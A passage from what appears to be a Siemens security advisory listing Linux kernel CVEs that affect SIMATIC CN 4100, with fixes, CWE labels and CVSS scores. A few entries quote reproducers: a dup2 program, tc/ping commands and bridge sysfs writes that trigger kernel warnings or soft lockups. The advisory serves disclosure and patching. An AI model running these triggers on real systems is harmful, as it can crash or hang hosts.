find_hw_thread_mask() The function divides number of online CPUs by num_core_siblings, and later checks the divider by zero. This implies a possibility to get and divide-by-zero runtime error. Fix it by moving the check prior to division. This also helps to save one indentation level. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-369 Divide By Zero Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39743 In the Linux kernel, the following vulnerability has been resolved: jfs: truncate good inode pages when hard link is 0 The fileset value of the inode copy from the disk by the reproducer is AGGR_RESERVED_I. When executing evict, its hard link number is 0, so its inode pages are not truncated. This causes the bugon to be triggered when executing clear_inode() because nrpages is greater than 0. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39749 In the Linux kernel, the following vulnerability has been resolved: rcu: Protect ->defer_qs_iw_pending from data race On kernels built with CONFIG_IRQ_WORK=y, when rcu_read_unlock() is invoked within an interrupts-disabled region of code [1], it will invoke rcu_read_unlock_special(), which uses an irq-work handler to force the system to notice when the RCU read-side critical section actually ends. That end won't happen until interrupts are enabled at the soonest. In some kernels, such as those booted with rcutree.use_softirq=y, the irq-work handler is used unconditionally. The per-CPU rcu_data structure's ->defer_qs_iw_pending field is updated by the irq-work handler and is both read and updated by rcu_read_unlock_special(). This resulted in the following KCSAN splat: ------------------------------------------------------------------------ BUG: KCSAN: data-race in rcu_preempt_deferred_qs_handler / rcu_read_unlock_special read to 0xffff96b95f42d8d8 of 1 bytes by task 90 on cpu 8: rcu_read_unlock_special+0x175/0x260 __rcu_read_unlock+0x92/0xa0 rt_spin_unlock+0x9b/0xc0 __local_bh_enable+0x10d/0x170 __local_bh_enable_ip+0xfb/0x150 rcu_do_batch+0x595/0xc40 rcu_cpu_kthread+0x4e9/0x830 smpboot_thread_fn+0x24d/0x3b0 kthread+0x3bd/0x410 ret_from_fork+0x35/0x40 ret_from_fork_asm+0x1a/0x30 write to 0xffff96b95f42d8d8 of 1 bytes by task 88 on cpu 8: rcu_preempt_deferred_qs_handler+0x1e/0x30 irq_work_single+0xaf/0x160 run_irq_workd+0x91/0xc0 smpboot_thread_fn+0x24d/0x3b0 kthread+0x3bd/0x410 ret_from_fork+0x35/0x40 ret_from_fork_asm+0x1a/0x30 no locks held by irq_work/8/88. irq event stamp: 200272 hardirqs last enabled at (200272): [] finish_task_switch+0x131/0x320 hardirqs last disabled at (200271): [] __schedule+0x129/0xd70 softirqs last enabled at (0): [] copy_process+0x4df/0x1cc0 softirqs last disabled at (0): [<0000000000000000>] 0x0 ------------------------------------------------------------------------ The problem is that irq-work handlers run with interrupts enabled, which means that rcu_preempt_deferred_qs_handler() could be interrupted, and that interrupt handler might contain an RCU read-side critical section, which might invoke rcu_read_unlock_special(). In the strict KCSAN mode of operation used by RCU, this constitutes a data race on the ->defer_qs_iw_pending field. This commit therefore disables interrupts across the portion of the rcu_preempt_deferred_qs_handler() that updates the ->defer_qs_iw_pending field. This suffices because this handler is not a fast path. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39752 In the Linux kernel, the following vulnerability has been resolved: ARM: rockchip: fix kernel hang during smp initialization In order to bring up secondary CPUs main CPU write trampoline code to SRAM. The trampoline code is written while secondary CPUs are powered on (at least that true for RK3188 CPU). Sometimes that leads to kernel hang. Probably because secondary CPU execute trampoline code while kernel doesn't expect. The patch moves SRAM initialization step to the point where all secondary CPUs are powered down. That fixes rarely hangs on RK3188: [ 0.091568] CPU0: thread -1, cpu 0, socket 0, mpidr 80000000 [ 0.091996] rockchip_smp_prepare_cpus: ncores 4 View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-364 Signal Handler Race Condition Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39756 In the Linux kernel, the following vulnerability has been resolved: fs: Prevent file descriptor table allocations exceeding INT_MAX When sysctl_nr_open is set to a very high value (for example, 1073741816 as set by systemd), processes attempting to use file descriptors near the limit can trigger massive memory allocation attempts that exceed INT_MAX, resulting in a WARNING in mm/slub.c: WARNING: CPU: 0 PID: 44 at mm/slub.c:5027 __kvmalloc_node_noprof+0x21a/0x288 This happens because kvmalloc_array() and kvmalloc() check if the requested size exceeds INT_MAX and emit a warning when the allocation is not flagged with __GFP_NOWARN. Specifically, when nr_open is set to 1073741816 (0x3ffffff8) and a process calls dup2(oldfd, 1073741880), the kernel attempts to allocate: - File descriptor array: 1073741880 * 8 bytes = 8,589,935,040 bytes - Multiple bitmaps: ~400MB - Total allocation size: > 8GB (exceeding INT_MAX = 2,147,483,647) Reproducer: 1. Set /proc/sys/fs/nr_open to 1073741816: # echo 1073741816 > /proc/sys/fs/nr_open 2. Run a program that uses a high file descriptor: #include #include int main() { struct rlimit rlim = {1073741824, 1073741824}; setrlimit(RLIMIT_NOFILE, &rlim); dup2(2, 1073741880); // Triggers the warning return 0; } 3. Observe WARNING in dmesg at mm/slub.c:5027 systemd commit a8b627a introduced automatic bumping of fs.nr_open to the maximum possible value. The rationale was that systems with memory control groups (memcg) no longer need separate file descriptor limits since memory is properly accounted. However, this change overlooked that: 1. The kernel's allocation functions still enforce INT_MAX as a maximum size regardless of memcg accounting 2. Programs and tests that legitimately test file descriptor limits can inadvertently trigger massive allocations 3. The resulting allocations (>8GB) are impractical and will always fail systemd's algorithm starts with INT_MAX and keeps halving the value until the kernel accepts it. On most systems, this results in nr_open being set to 1073741816 (0x3ffffff8), which is just under 1GB of file descriptors. While processes rarely use file descriptors near this limit in normal operation, certain selftests (like tools/testing/selftests/core/unshare_test.c) and programs that test file descriptor limits can trigger this issue. Fix this by adding a check in alloc_fdtable() to ensure the requested allocation size does not exceed INT_MAX. This causes the operation to fail with -EMFILE instead of triggering a kernel warning and avoids the impractical >8GB memory allocation request. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39757 In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Validate UAC3 cluster segment descriptors UAC3 class segment descriptors need to be verified whether their sizes match with the declared lengths and whether they fit with the allocated buffer sizes, too. Otherwise malicious firmware may lead to the unexpected OOB accesses. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-39759 In the Linux kernel, the following vulnerability has been resolved: btrfs: qgroup: fix race between quota disable and quota rescan ioctl There's a race between a task disabling quotas and another running the rescan ioctl that can result in a use-after-free of qgroup records from the fs_info->qgroup_tree rbtree. This happens as follows: 1) Task A enters btrfs_ioctl_quota_rescan() -> btrfs_qgroup_rescan(); 2) Task B enters btrfs_quota_disable() and calls btrfs_qgroup_wait_for_completion(), which does nothing because at that point fs_info->qgroup_rescan_running is false (it wasn't set yet by task A); 3) Task B calls btrfs_free_qgroup_config() which starts freeing qgroups from fs_info->qgroup_tree without taking the lock fs_info->qgroup_lock; 4) Task A enters qgroup_rescan_zero_tracking() which starts iterating the fs_info->qgroup_tree tree while holding fs_info->qgroup_lock, but task B is freeing qgroup records from that tree without holding the lock, resulting in a use-after-free. Fix this by taking fs_info->qgroup_lock at btrfs_free_qgroup_config(). Also at btrfs_qgroup_rescan() don't start the rescan worker if quotas were already disabled. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39760 In the Linux kernel, the following vulnerability has been resolved: usb: core: config: Prevent OOB read in SS endpoint companion parsing usb_parse_ss_endpoint_companion() checks descriptor type before length, enabling a potentially odd read outside of the buffer size. Fix this up by checking the size first before looking at any of the fields in the descriptor. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39766 In the Linux kernel, the following vulnerability has been resolved: net/sched: Make cake_enqueue return NET_XMIT_CN when past buffer_limit The following setup can trigger a WARNING in htb_activate due to the condition: !cl->leaf.q->q.qlen tc qdisc del dev lo root tc qdisc add dev lo root handle 1: htb default 1 tc class add dev lo parent 1: classid 1:1 \ htb rate 64bit tc qdisc add dev lo parent 1:1 handle f: \ cake memlimit 1b ping -I lo -f -c1 -s64 -W0.001 127.0.0.1 This is because the low memlimit leads to a low buffer_limit, which causes packet dropping. However, cake_enqueue still returns NET_XMIT_SUCCESS, causing htb_enqueue to call htb_activate with an empty child qdisc. We should return NET_XMIT_CN when packets are dropped from the same tin and flow. I do not believe return value of NET_XMIT_CN is necessary for packet drops in the case of ack filtering, as that is meant to optimize performance, not to signal congestion. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39770 In the Linux kernel, the following vulnerability has been resolved: net: gso: Forbid IPv6 TSO with extensions on devices with only IPV6_CSUM When performing Generic Segmentation Offload (GSO) on an IPv6 packet that contains extension headers, the kernel incorrectly requests checksum offload if the egress device only advertises NETIF_F_IPV6_CSUM feature, which has a strict contract: it supports checksum offload only for plain TCP or UDP over IPv6 and explicitly does not support packets with extension headers. The current GSO logic violates this contract by failing to disable the feature for packets with extension headers, such as those used in GREoIPv6 tunnels. This violation results in the device being asked to perform an operation it cannot support, leading to a `skb_warn_bad_offload` warning and a collapse of network throughput. While device TSO/USO is correctly bypassed in favor of software GSO for these packets, the GSO stack must be explicitly told not to request checksum offload. Mask NETIF_F_IPV6_CSUM, NETIF_F_TSO6 and NETIF_F_GSO_UDP_L4 in gso_features_check if the IPv6 header contains extension headers to compute checksum in software. The exception is a BIG TCP extension, which, as stated in commit 68e068cabd2c6c53 ("net: reenable NETIF_F_IPV6_CSUM offload for BIG TCP packets"): "The feature is only enabled on devices that support BIG TCP TSO. The header is only present for PF_PACKET taps like tcpdump, and not transmitted by physical devices." kernel log output (truncated): WARNING: CPU: 1 PID: 5273 at net/core/dev.c:3535 skb_warn_bad_offload+0x81/0x140 ... Call Trace: skb_checksum_help+0x12a/0x1f0 validate_xmit_skb+0x1a3/0x2d0 validate_xmit_skb_list+0x4f/0x80 sch_direct_xmit+0x1a2/0x380 __dev_xmit_skb+0x242/0x670 __dev_queue_xmit+0x3fc/0x7f0 ip6_finish_output2+0x25e/0x5d0 ip6_finish_output+0x1fc/0x3f0 ip6_tnl_xmit+0x608/0xc00 [ip6_tunnel] ip6gre_tunnel_xmit+0x1c0/0x390 [ip6_gre] dev_hard_start_xmit+0x63/0x1c0 __dev_queue_xmit+0x6d0/0x7f0 ip6_finish_output2+0x214/0x5d0 ip6_finish_output+0x1fc/0x3f0 ip6_xmit+0x2ca/0x6f0 ip6_finish_output+0x1fc/0x3f0 ip6_xmit+0x2ca/0x6f0 inet6_csk_xmit+0xeb/0x150 __tcp_transmit_skb+0x555/0xa80 tcp_write_xmit+0x32a/0xe90 tcp_sendmsg_locked+0x437/0x1110 tcp_sendmsg+0x2f/0x50 ... skb linear: 00000000: e4 3d 1a 7d ec 30 e4 3d 1a 7e 5d 90 86 dd 60 0e skb linear: 00000010: 00 0a 1b 34 3c 40 20 11 00 00 00 00 00 00 00 00 skb linear: 00000020: 00 00 00 00 00 12 20 11 00 00 00 00 00 00 00 00 skb linear: 00000030: 00 00 00 00 00 11 2f 00 04 01 04 01 01 00 00 00 skb linear: 00000040: 86 dd 60 0e 00 0a 1b 00 06 40 20 23 00 00 00 00 skb linear: 00000050: 00 00 00 00 00 00 00 00 00 12 20 23 00 00 00 00 skb linear: 00000060: 00 00 00 00 00 00 00 00 00 11 bf 96 14 51 13 f9 skb linear: 00000070: ae 27 a0 a8 2b e3 80 18 00 40 5b 6f 00 00 01 01 skb linear: 00000080: 08 0a 42 d4 50 d5 4b 70 f8 1a View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-573 Improper Following of Specification by Caller Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39772 In the Linux kernel, the following vulnerability has been resolved: drm/hisilicon/hibmc: fix the hibmc loaded failed bug When hibmc loaded failed, the driver use hibmc_unload to free the resource, but the mutexes in mode.config are not init, which will access an NULL pointer. Just change goto statement to return, because hibnc_hw_init() doesn't need to free anything. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39773 In the Linux kernel, the following vulnerability has been resolved: net: bridge: fix soft lockup in br_multicast_query_expired() When set multicast_query_interval to a large value, the local variable 'time' in br_multicast_send_query() may overflow. If the time is smaller than jiffies, the timer will expire immediately, and then call mod_timer() again, which creates a loop and may trigger the following soft lockup issue. watchdog: BUG: soft lockup - CPU#1 stuck for 221s! [rb_consumer:66] CPU: 1 UID: 0 PID: 66 Comm: rb_consumer Not tainted 6.16.0+ #259 PREEMPT(none) Call Trace: __netdev_alloc_skb+0x2e/0x3a0 br_ip6_multicast_alloc_query+0x212/0x1b70 __br_multicast_send_query+0x376/0xac0 br_multicast_send_query+0x299/0x510 br_multicast_query_expired.constprop.0+0x16d/0x1b0 call_timer_fn+0x3b/0x2a0 __run_timers+0x619/0x950 run_timer_softirq+0x11c/0x220 handle_softirqs+0x18e/0x560 __irq_exit_rcu+0x158/0x1a0 sysvec_apic_timer_interrupt+0x76/0x90 This issue can be reproduced with: ip link add br0 type bridge echo 1 > /sys/class/net/br0/bridge/multicast_querier echo 0xffffffffffffffff > /sys/class/net/br0/bridge/multicast_query_interval ip link set dev br0 up The multicast_startup_query_interval can also cause this issue. Similar to the commit 99b40610956a ("net: bridge: mcast: add and enforce query interval minimum"), add check for the query interval maximum to fix this issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-667 Improper Locking Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39776 In the Linux kernel, the following vulnerability has been resolved: mm/debug_vm_pgtable: clear page table entries at destroy_args() The mm/debug_vm_pagetable test allocates manually page table entries for the tests it runs, using also its manually allocated mm_struct. That in itself is ok, but when it exits, at destroy_args() it fails to clear those entries with the *_clear functions. The problem is that leaves stale entries. If another process allocates an mm_struct with a pgd at the same address, it may end up running into the stale entry. This is happening in practice on a debug kernel with CONFIG_DEBUG_VM_PGTABLE=y, for example this is the output with some extra debugging I added (it prints a warning trace if pgtables_bytes goes negative, in addition to the warning at check_mm() function): [ 2.539353] debug_vm_pgtable: [get_random_vaddr ]: random_vaddr is 0x7ea247140000 [ 2.539366] kmem_cache info [ 2.539374] kmem_cachep 0x000000002ce82385 - freelist 0x0000000000000000 - offset 0x508 [ 2.539447] debug_vm_pgtable: [init_args ]: args->mm is 0x000000002267cc9e (...) [ 2.552800] WARNING: CPU: 5 PID: 116 at include/linux/mm.h:2841 free_pud_range+0x8bc/0x8d0 [ 2.552816] Modules linked in: [ 2.552843] CPU: 5 UID: 0 PID: 116 Comm: modprobe Not tainted 6.12.0-105.debug_vm2.el10.ppc64le+debug #1 VOLUNTARY [ 2.552859] Hardware name: IBM,9009-41A POWER9 (architected) 0x4e0202 0xf000005 of:IBM,FW910.00 (VL910_062) hv:phyp pSeries [ 2.552872] NIP: c0000000007eef3c LR: c0000000007eef30 CTR: c0000000003d8c90 [ 2.552885] REGS: c0000000622e73b0 TRAP: 0700 Not tainted (6.12.0-105.debug_vm2.el10.ppc64le+debug) [ 2.552899] MSR: 800000000282b033 CR: 24002822 XER: 0000000a [ 2.552954] CFAR: c0000000008f03f0 IRQMASK: 0 [ 2.552954] GPR00: c0000000007eef30 c0000000622e7650 c000000002b1ac00 0000000000000001 [ 2.552954] GPR04: 0000000000000008 0000000000000000 c0000000007eef30 ffffffffffffffff [ 2.552954] GPR08: 00000000ffff00f5 0000000000000001 0000000000000048 0000000000004000 [ 2.552954] GPR12: 00000003fa440000 c000000017ffa300 c0000000051d9f80 ffffffffffffffdb [ 2.552954] GPR16: 0000000000000000 0000000000000008 000000000000000a 60000000000000e0 [ 2.552954] GPR20: 4080000000000000 c0000000113af038 00007fffcf130000 0000700000000000 [ 2.552954] GPR24: c000000062a6a000 0000000000000001 8000000062a68000 0000000000000001 [ 2.552954] GPR28: 000000000000000a c000000062ebc600 0000000000002000 c000000062ebc760 [ 2.553170] NIP [c0000000007eef3c] free_pud_range+0x8bc/0x8d0 [ 2.553185] LR [c0000000007eef30] free_pud_range+0x8b0/0x8d0 [ 2.553199] Call Trace: [ 2.553207] [c0000000622e7650] [c0000000007eef30] free_pud_range+0x8b0/0x8d0 (unreliable) [ 2.553229] [c0000000622e7750] [c0000000007f40b4] free_pgd_range+0x284/0x3b0 [ 2.553248] [c0000000622e7800] [c0000000007f4630] free_pgtables+0x450/0x570 [ 2.553274] [c0000000622e78e0] [c0000000008161c0] exit_mmap+0x250/0x650 [ 2.553292] [c0000000622e7a30] [c0000000001b95b8] __mmput+0x98/0x290 [ 2.558344] [c0000000622e7a80] [c0000000001d1018] exit_mm+0x118/0x1b0 [ 2.558361] [c0000000622e7ac0] [c0000000001d141c] do_exit+0x2ec/0x870 [ 2.558376] [c0000000622e7b60] [c0000000001d1ca8] do_group_exit+0x88/0x150 [ 2.558391] [c0000000622e7bb0] [c0000000001d1db8] sys_exit_group+0x48/0x50 [ 2.558407] [c0000000622e7be0] [c00000000003d810] system_call_exception+0x1e0/0x4c0 [ 2.558423] [c0000000622e7e50] [c00000000000d05c] system_call_vectored_common+0x15c/0x2ec (...) [ 2.558892] ---[ end trace 0000000000000000 ]--- [ 2.559022] BUG: Bad rss-counter state mm:000000002267cc9e type:MM_ANONPAGES val:1 [ 2.559037] BUG: non-zero pgtables_bytes on freeing mm: -6144 Here the modprobe process ended up with an allocated mm_struct from the mm_struct slab that was used before by the debug_vm_pgtable test. That is not a problem, since the mm_stru ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39782 In the Linux kernel, the following vulnerability has been resolved: jbd2: prevent softlockup in jbd2_log_do_checkpoint() Both jbd2_log_do_checkpoint() and jbd2_journal_shrink_checkpoint_list() periodically release j_list_lock after processing a batch of buffers to avoid long hold times on the j_list_lock. However, since both functions contend for j_list_lock, the combined time spent waiting and processing can be significant. jbd2_journal_shrink_checkpoint_list() explicitly calls cond_resched() when need_resched() is true to avoid softlockups during prolonged operations. But jbd2_log_do_checkpoint() only exits its loop when need_resched() is true, relying on potentially sleeping functions like __flush_batch() or wait_on_buffer() to trigger rescheduling. If those functions do not sleep, the kernel may hit a softlockup. watchdog: BUG: soft lockup - CPU#3 stuck for 156s! [kworker/u129:2:373] CPU: 3 PID: 373 Comm: kworker/u129:2 Kdump: loaded Not tainted 6.6.0+ #10 Hardware name: Huawei TaiShan 2280 /BC11SPCD, BIOS 1.27 06/13/2017 Workqueue: writeback wb_workfn (flush-7:2) pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : native_queued_spin_lock_slowpath+0x358/0x418 lr : jbd2_log_do_checkpoint+0x31c/0x438 [jbd2] Call trace: native_queued_spin_lock_slowpath+0x358/0x418 jbd2_log_do_checkpoint+0x31c/0x438 [jbd2] __jbd2_log_wait_for_space+0xfc/0x2f8 [jbd2] add_transaction_credits+0x3bc/0x418 [jbd2] start_this_handle+0xf8/0x560 [jbd2] jbd2__journal_start+0x118/0x228 [jbd2] __ext4_journal_start_sb+0x110/0x188 [ext4] ext4_do_writepages+0x3dc/0x740 [ext4] ext4_writepages+0xa4/0x190 [ext4] do_writepages+0x94/0x228 __writeback_single_inode+0x48/0x318 writeback_sb_inodes+0x204/0x590 __writeback_inodes_wb+0x54/0xf8 wb_writeback+0x2cc/0x3d8 wb_do_writeback+0x2e0/0x2f8 wb_workfn+0x80/0x2a8 process_one_work+0x178/0x3e8 worker_thread+0x234/0x3b8 kthread+0xf0/0x108 ret_from_fork+0x10/0x20 So explicitly call cond_resched() in jbd2_log_do_checkpoint() to avoid softlockup. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39783 In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: Fix configfs group list head handling Doing a list_del() on the epf_group field of struct pci_epf_driver in pci_epf_remove_cfs() is not correct as this field is a list head, not a list entry. This list_del() call triggers a KASAN warning when an endpoint function driver which has a configfs attribute group is torn down: ================================================================== BUG: KASAN: slab-use-after-free in pci_epf_remove_cfs+0x17c/0x198 Write of size 8 at addr ffff00010f4a0d80 by task rmmod/319 CPU: 3 UID: 0 PID: 319 Comm: rmmod Not tainted 6.16.0-rc2 #1 NONE Hardware name: Radxa ROCK 5B (DT) Call trace: show_stack+0x2c/0x84 (C) dump_stack_lvl+0x70/0x98 print_report+0x17c/0x538 kasan_report+0xb8/0x190 __asan_report_store8_noabort+0x20/0x2c pci_epf_remove_cfs+0x17c/0x198 pci_epf_unregister_driver+0x18/0x30 nvmet_pci_epf_cleanup_module+0x24/0x30 [nvmet_pci_epf] __arm64_sys_delete_module+0x264/0x424 invoke_syscall+0x70/0x260 el0_svc_common.constprop.0+0xac/0x230 do_el0_svc+0x40/0x58 el0_svc+0x48/0xdc el0t_64_sync_handler+0x10c/0x138 el0t_64_sync+0x198/0x19c ... Remove this incorrect list_del() call from pci_epf_remove_cfs(). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39787 In the Linux kernel, the following vulnerability has been resolved: soc: qcom: mdt_loader: Ensure we don't read past the ELF header When the MDT loader is used in remoteproc, the ELF header is sanitized beforehand, but that's not necessary the case for other clients. Validate the size of the firmware buffer to ensure that we don't read past the end as we iterate over the header. e_phentsize and e_shentsize are validated as well, to ensure that the assumptions about step size in the traversal are valid. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39788 In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: exynos: Fix programming of HCI_UTRL_NEXUS_TYPE On Google gs101, the number of UTP transfer request slots (nutrs) is 32, and in this case the driver ends up programming the UTRL_NEXUS_TYPE incorrectly as 0. This is because the left hand side of the shift is 1, which is of type int, i.e. 31 bits wide. Shifting by more than that width results in undefined behaviour. Fix this by switching to the BIT() macro, which applies correct type casting as required. This ensures the correct value is written to UTRL_NEXUS_TYPE (0xffffffff on gs101), and it also fixes a UBSAN shift warning: UBSAN: shift-out-of-bounds in drivers/ufs/host/ufs-exynos.c:1113:21 shift exponent 32 is too large for 32-bit type 'int' For consistency, apply the same change to the nutmrs / UTMRL_NEXUS_TYPE write. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39790 In the Linux kernel, the following vulnerability has been resolved: bus: mhi: host: Detect events pointing to unexpected TREs When a remote device sends a completion event to the host, it contains a pointer to the consumed TRE. The host uses this pointer to process all of the TREs between it and the host's local copy of the ring's read pointer. This works when processing completion for chained transactions, but can lead to nasty results if the device sends an event for a single-element transaction with a read pointer that is multiple elements ahead of the host's read pointer. For instance, if the host accesses an event ring while the device is updating it, the pointer inside of the event might still point to an old TRE. If the host uses the channel's xfer_cb() to directly free the buffer pointed to by the TRE, the buffer will be double-freed. This behavior was observed on an ep that used upstream EP stack without 'commit 6f18d174b73d ("bus: mhi: ep: Update read pointer only after buffer is written")'. Where the device updated the events ring pointer before updating the event contents, so it left a window where the host was able to access the stale data the event pointed to, before the device had the chance to update them. The usual pattern was that the host received an event pointing to a TRE that is not immediately after the last processed one, so it got treated as if it was a chained transaction, processing all of the TREs in between the two read pointers. This commit aims to harden the host by ensuring transactions where the event points to a TRE that isn't local_rp + 1 are chained. [mani: added stable tag and reworded commit message] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-415 Double Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.7 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CVE-2025-39794 In the Linux kernel, the following vulnerability has been resolved: ARM: tegra: Use I/O memcpy to write to IRAM Kasan crashes the kernel trying to check boundaries when using the normal memcpy. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVE-2025-39795 In the Linux kernel, the following vulnerability has been resolved: block: avoid possible overflow for chunk_sectors check in blk_stack_limits() In blk_stack_limits(), we check that the t->chunk_sectors value is a 